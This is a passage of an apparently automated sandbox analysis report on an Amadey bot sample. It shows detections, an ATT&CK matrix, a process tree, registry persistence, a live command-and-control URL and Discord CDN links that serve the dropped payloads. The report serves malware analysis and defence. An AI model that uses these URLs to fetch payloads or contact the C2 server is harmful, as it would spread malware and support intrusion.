              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,13_2_00403CE0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,??_U@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,16_2_00403CE0
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_00291862 cpuid 0_2_00291862
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01010641 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_01010641
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_0101E94F _free,GetTimeZoneInformation,_free,3_2_0101E94F
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01004010 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,3_2_01004010
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01001DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,3_2_01001DA0

              Stealing of Sensitive Information:

              barindex
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933021893.000000000137E000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.927044420.0000000001359000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rnyuf.exe PID: 6908, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture111System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1Registry Run Keys / Startup Folder21Process Injection111Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture111Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder21Masquerading1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsSecurity Software Discovery121VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion21Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 473548 Sample: mvoElayshk.exe Startdate: 29/08/2021 Architecture: WINDOWS Score: 100 136 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->136 138 Found malware configuration 2->138 140 Antivirus / Scanner detection for submitted sample 2->140 142 6 other signatures 2->142 14 mvoElayshk.exe 3 2->14         started        17 1sb1iwyem7.exe 2->17         started        19 1sb1iwyem7.exe 2->19         started        21 4 other processes 2->21 process3 file4 126 C:\Users\user\AppData\Local\Temp\a.exe, PE32 14->126 dropped 128 C:\Users\user\AppData\...\mvoElayshk.exe.log, ASCII 14->128 dropped 23 a.exe 4 14->23         started        27 1sb1iwyem7.exe 17->27         started        29 cmd.exe 17->29         started        31 1sb1iwyem7.exe 19->31         started        33 cmd.exe 19->33         started        35 5mgcqk6jl.exe 21->35         started        process5 file6 124 C:\Users\user\AppData\Local\...\rnyuf.exe, PE32 23->124 dropped 154 Multi AV Scanner detection for dropped file 23->154 156 Machine Learning detection for dropped file 23->156 158 Contains functionality to inject code into remote processes 23->158 37 rnyuf.exe 2 22 23->37         started        42 cmd.exe 27->42         started        44 cmd.exe 29->44         started        46 conhost.exe 29->46         started        48 taskkill.exe 29->48         started        50 cmd.exe 31->50         started        52 cmd.exe 33->52         started        54 conhost.exe 33->54         started        56 5mgcqk6jl.exe 35->56         started        signatures7 process8 dnsIp9 130 46.17.96.36, 49734, 49735, 49738 HOSTKEY-ASNL Netherlands 37->130 132 cdn.discordapp.com 162.159.134.233, 443, 49736, 49737 CLOUDFLARENETUS United States 37->132 134 192.168.2.1 unknown unknown 37->134 116 C:\Users\user\AppData\Local\...\5mgcqk6jl.exe, PE32 37->116 dropped 118 C:\Users\user\AppData\...\1sb1iwyem7.exe, PE32 37->118 dropped 120 C:\Users\user\AppData\...\5mgcqk6jl[1].exe, PE32 37->120 dropped 122 C:\Users\user\AppData\...\1sb1iwyem7[1].exe, PE32 37->122 dropped 146 Multi AV Scanner detection for dropped file 37->146 148 Machine Learning detection for dropped file 37->148 150 Creates multiple autostart registry keys 37->150 152 Uses schtasks.exe or at.exe to add and modify task schedules 37->152 58 1sb1iwyem7.exe 5 37->58         started        61 5mgcqk6jl.exe 37->61         started        63 cmd.exe 1 37->63         started        65 schtasks.exe 1 37->65         started        73 3 other processes 42->73 67 tasklist.exe 44->67         started        75 2 other processes 50->75 69 tasklist.exe 52->69         started        71 5mgcqk6jl.exe 56->71         started        file10 signatures11 process12 signatures13 160 Multi AV Scanner detection for dropped file 58->160 162 Contains functionality to register a low level keyboard hook 58->162 77 1sb1iwyem7.exe 3 58->77         started        79 cmd.exe 1 58->79         started        81 5mgcqk6jl.exe 61->81         started        83 reg.exe 1 63->83         started        86 conhost.exe 63->86         started        88 conhost.exe 65->88         started        90 tasklist.exe 73->90         started        92 tasklist.exe 75->92         started        process14 signatures15 94 cmd.exe 1 77->94         started        96 conhost.exe 79->96         started        98 5mgcqk6jl.exe 81->98         started        144 Creates an undocumented autostart registry key 83->144 process16 process17 100 cmd.exe 1 94->100         started        102 conhost.exe 94->102         started        104 taskkill.exe 94->104         started        106 5mgcqk6jl.exe 98->106         started        process18 108 tasklist.exe 1 100->108         started        110 5mgcqk6jl.exe 106->110         started        process19 112 5mgcqk6jl.exe 110->112         started        process20 114 5mgcqk6jl.exe 112->114         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              mvoElayshk.exe55%VirustotalBrowse
              mvoElayshk.exe69%ReversingLabsWin32.Trojan.Amadey
              mvoElayshk.exe100%AviraHEUR/AGEN.1142320
              mvoElayshk.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\a.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\1sb1iwyem7[1].exe57%ReversingLabsWin32.Trojan.Tasker
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\5mgcqk6jl[1].exe15%MetadefenderBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\5mgcqk6jl[1].exe57%ReversingLabsWin32.Trojan.Tasker
              C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe57%ReversingLabsWin32.Trojan.Tasker
              C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe62%ReversingLabsWin32.Trojan.Amadey
              C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe15%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe57%ReversingLabsWin32.Trojan.Tasker
              C:\Users\user\AppData\Local\Temp\a.exe62%ReversingLabsWin32.Trojan.Amadey

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              43.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              58.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              33.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              37.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              48.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              61.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              57.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              32.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              55.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              24.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              45.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              50.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              31.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              47.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.mvoElayshk.exe.124819f0.2.unpack100%AviraHEUR/AGEN.1131354Download File
              62.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.mvoElayshk.exe.280000.0.unpack100%AviraHEUR/AGEN.1142320Download File
              30.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.0.mvoElayshk.exe.282240.1.unpack100%AviraHEUR/AGEN.1131354Download File
              54.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.mvoElayshk.exe.282240.1.unpack100%AviraHEUR/AGEN.1131354Download File
              13.1.1sb1iwyem7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              46.1.5mgcqk6jl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://46.17.96.36/0%VirustotalBrowse
              http://46.17.96.36/0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php10%Avira URL Cloudsafe
              https://report-uri.clo0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=130%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1s0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1p60%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1/0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1o0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1Users0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=10%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1l0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1G0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1mpA0%Avira URL Cloudsafe
              http://46.17.96.36/10%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1=10%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php/k8FppT/index.php0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1?0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1m7.0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.phpP0%Avira URL Cloudsafe
              http://46.17.96.36/k8F0%Avira URL Cloudsafe
              46.17.96.36/k8FppT/index.php0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1qk6jl0%Avira URL Cloudsafe
              http://46.17.96.36/17.96.36/k8FppT/index.php?scr=10%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1K0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php#0%Avira URL Cloudsafe
              http://46.17.96.36/k8FppT/index.php?scr=1_0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cdn.discordapp.com
              		162.159.134.233
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://46.17.96.36/k8FppT/index.php?scr=1true
                • Avira URL Cloud: safe
                		unknown
                http://cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exefalse
                  		high
                  http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exefalse
                    		high
                    http://46.17.96.36/k8FppT/index.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    46.17.96.36/k8FppT/index.phptrue
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://46.17.96.36/rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://46.17.96.36/k8FppT/index.php1rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exedrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                      		high
                      https://report-uri.clornyuf.exe, 00000005.00000003.667402130.00000000013A6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://46.17.96.36/k8FppT/index.php?scr=13rnyuf.exe, 00000005.00000003.670823365.0000000001380000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://46.17.96.36/k8FppT/index.php?scr=1srnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe(rnyuf.exe, 00000005.00000003.667374060.0000000001380000.00000004.00000001.sdmpfalse
                        		high
                        http://46.17.96.36/k8FppT/index.php?scr=1p6rnyuf.exe, 00000005.00000003.669850855.00000000013A6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://46.17.96.36/k8FppT/index.php?scr=1/rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://46.17.96.36/k8FppT/index.php?scr=1ornyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeJrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                          		high
                          http://46.17.96.36/k8FppT/index.php?scr=1Usersrnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://46.17.96.36/k8FppT/index.php?scr=1lrnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://46.17.96.36/k8FppT/index.php?scr=1Grnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://46.17.96.36/k8FppT/index.php?scr=1mpArnyuf.exe, 00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://46.17.96.36/1rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.discordapp.com/rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                            		high
                            http://46.17.96.36/k8FppT/index.php?scr=1=1rnyuf.exe, 00000005.00000003.675356425.00000000013E0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exernyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpfalse
                              		high
                              http://46.17.96.36/k8FppT/index.php/k8FppT/index.phprnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://46.17.96.36/k8FppT/index.php?scr=1?rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://46.17.96.36/k8FppT/index.php?scr=1m7.rnyuf.exe, 00000005.00000003.669850855.00000000013A6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exenrnyuf.exe, 00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmpfalse
                                		high
                                https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeWrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                                  		high
                                  http://46.17.96.36/k8FppT/index.phpPrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://46.17.96.36/k8Frnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeHrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                                    		high
                                    https://cdn.discordapp.com/Nrnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                                      		high
                                      http://46.17.96.36/k8FppT/index.php?scr=1qk6jlrnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://46.17.96.36/17.96.36/k8FppT/index.php?scr=1rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://46.17.96.36/k8FppT/index.php?scr=1Krnyuf.exe, 00000005.00000003.671834132.0000000001380000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://46.17.96.36/k8FppT/index.php#rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://46.17.96.36/k8FppT/index.php?scr=1_rnyuf.exe, 00000005.00000003.670823365.0000000001380000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exernyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpfalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        46.17.96.36
                                        		unknownNetherlands
                                        		57043HOSTKEY-ASNLtrue
                                        162.159.134.233
                                        		cdn.discordapp.comUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:473548
                                        Start date:29.08.2021
                                        Start time:22:26:12
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 14m 16s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:mvoElayshk.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:63
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@100/16@1/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 100% (good quality ratio 95.1%)
                                        • Quality average: 86.8%
                                        • Quality standard deviation: 24.4%
                                        HCA Information:
                                        • Successful, ratio: 56%
                                        • Number of executed functions: 183
                                        • Number of non-executed functions: 235
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.226, 173.222.108.210
                                        • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com, audownload.windowsupdate.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dscg3.akamai.net, arc.msn.com, au-bg-shim.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        22:27:08API Interceptor2303x Sleep call for process: rnyuf.exe modified
                                        22:27:09Task SchedulerRun new task: rnyuf.exe path: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        22:27:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1sb1iwyem7.exe C:\Users\user\AppData\Local\Temp\1sb1iwyem7.\1sb1iwyem7.exe
                                        22:27:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1sb1iwyem7.exe C:\Users\user\AppData\Local\Temp\1sb1iwyem7.\1sb1iwyem7.exe
                                        22:27:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5mgcqk6jl.exe C:\Users\user\AppData\Local\Temp\5mgcqk6jl.\5mgcqk6jl.exe
                                        22:27:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5mgcqk6jl.exe C:\Users\user\AppData\Local\Temp\5mgcqk6jl.\5mgcqk6jl.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        162.159.134.233xuTyOmef1g.exeGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
                                        VMKwliCGEP.rtfGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        cdn.discordapp.comorder#455523.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Renetry Hack.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        gMWaIDKK37.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        hsRrR2KPY7.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        pCSou0ozZy.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        ZUd8KSXXVD.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        k2vbB70cV7.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        OCrlOxN8uU.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        kATDFWvtje.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        swiftcr.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        z5YaDxVg34.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
